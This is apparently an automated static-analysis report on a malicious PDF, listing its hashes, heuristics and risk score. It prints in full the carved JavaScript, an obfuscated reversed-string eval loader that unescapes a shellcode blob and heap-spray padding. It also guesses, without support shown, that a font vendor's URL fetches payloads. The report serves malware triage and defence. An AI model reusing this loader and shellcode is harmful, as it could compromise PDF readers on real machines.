Malicious PDF — malware analysis report

Static analysis result for SHA-256 967540a251d0907c…

MALICIOUS

PDF

69.9 KB First seen: 2026-05-07
MD5: 079dd185f2c8f811b851138f6436e103 SHA-1: 0327118a51d897ba15b907d2bba2262de4a5917b SHA-256: 967540a251d0907c5461eb764facf95f7e824c578780e2dd2b2bfe7033418249
68 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF document contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The ML classifier strongly flags this PDF as malicious. The extracted artifact 'javascript_obj0012_000.js' is a suspicious JavaScript file. The embedded URL 'http://www.bitstream.com' is likely used to fetch additional malicious content. The primary intent appears to be the execution of a second-stage payload via the embedded script.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x104F0 4452 bytes
SHA-256: d321ad6c17f2a4ef129e9c7338676401196a33eb6523dd20432e7bf841b81b73
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) )""(nioj.)" "(tilps."8d14  u % 37c4  u % 7888  u % 3f6a  u % 62de  u % f5a3  u % 54a6  u % f5fe  u % 125b  u % eca7  u % 9c7c  u % 18cb  u % bb2c  u % 27c9  u % e0a3  u % b4f1  u % 3d4f  u % 50c9  u % 105a  u % d813  u % 8138  u % 27b7  u % 9c6a  u % 5e26  u % 2492  u % c835  u % 9397  u % a8b4  u % 20c3  u % b49b  u % 8565  u % f1fb  u % 214b  u % eba1  u % 0c8c  u % fc5e  u % 15c6  u % b044  u % 5772  u % f4f5  u % 29ea  u % 2c85  u % 9929  u % 33b8  u % ebe8  u % 67f   f  u % 5308  u % 1991  u % cc17  u % 1deb  u % 9c1d  u % 50b2  u % a0aa  u % 8782  u % 0f94  u % 78d5  u % 4bd6  u % a030  u % 9804  u % 22c4  u % 0617  u % 2ed7  u % 29e6  u % 5468  u % ea72  u % 0855  u % d061  u % aea0  u % 54ee  u % 13d7  u % b3eb  u % 447c  u % e387  u % 4fcb  u % 8e3f  u % 42db  u % b5da  u % 5780  u % 286a  u % a785  u % 54ab  u % 7691  u % b717  u % 239b  u % 78b6  u % 0f79  u % 707a  u % fe11  u % 0d88  u % 64a9  u % 4f76  u % dc6d  u %  0   937  u % c3d1  u % 2dd1  u % d 0   98  u % 5a45  u % c3b9  u % c21b  u % bb8f  u % 3c94  u % 35d6  u % 3 0   90  u % 6511  u % cf13  u % 38ee  u % 4fe5  u % 4742  u % 339d  u % 631b  u % 24f8  u % abf5  u % bd2c  u % 929c  u %  0   070  u % f211  u %  0   070  u % 137d  u %  0   070  u % d451  u % f   f 0   9  u % f   ff   f  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u %  0   9 0   9  u %  0   9 0   9  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u %  0   9 0   9  u %  0   9 0   9  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u %  0   9 0   9  u % f   f 0   9  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u % f   ff   f  u % 8e6e  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u % be50  u % 57ee  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u %  c   0 c   0  u %  c   0 c   0  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u % 18bf  u % 2c40  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u % 4038  u % 380c  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u % 9881  u % b8a1  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u % 5185  u % a5be  u %  0   070  u % bb51  u %  0   070  u % 227a  u %  0   070  u % d451  u % 45 0   9  u % a5 0   9  u %  0   070  u % bb51  u %  0   070  u % 137d  u %  0   0 0   0  u % 04 0   0  u %  0   0 0   0  u % 0 0   01  u % 10 0   0  u % 4010  u %  0   0 0   0  u %  0   0 0   0  u % 10 0   0  u %  0   010  u % f   ff   f  u % f   ff   f  u %  0   070  u % 45c5  u %  0   070  u % 2e25  u % 10 0   0  u % 11 0   0  u %  0   070  u % 7f27  u %  0   070  u % ca8a  u % 10 0   0  u %  0   010  u %  0   070  u % bb51  u %  0   070  u % ca8a  u % 10 0   0  u % 11 0   0  u %  0   070  u % bb51  u %  0   070  u % 2bf7  u % ef   f7  u %  0   030  u %  0   070  u % bb51  u %  0   070  u % d451  u %  0   0 0   0  u % 0 0   01  u %  0   070  u % bb51  u % 10 0   0  u % 4010  u %  0   070  u % 7f27  u % 10 0   0  u % 4210  u %  0   070  u % 9951  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  c   0 c   0  u %  c   0 c   0  u %  0   070  u % 48 0   9  u %  0   070  u % 33 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u %  0   070  u % 48 0   9  u % cccc  u % cccc  u %  0   070  u % f651  u %  0   070  u % fe84  u % cccc  u % cccc  u %  0   070  u % 9194  u %  c   0 c   0  u %  c   0 c   0  u % " (epak = olygak rav ;epacsenu = epak rav ';
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x319 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

Open this report in the interactive analyzer, or submit your own file for analysis.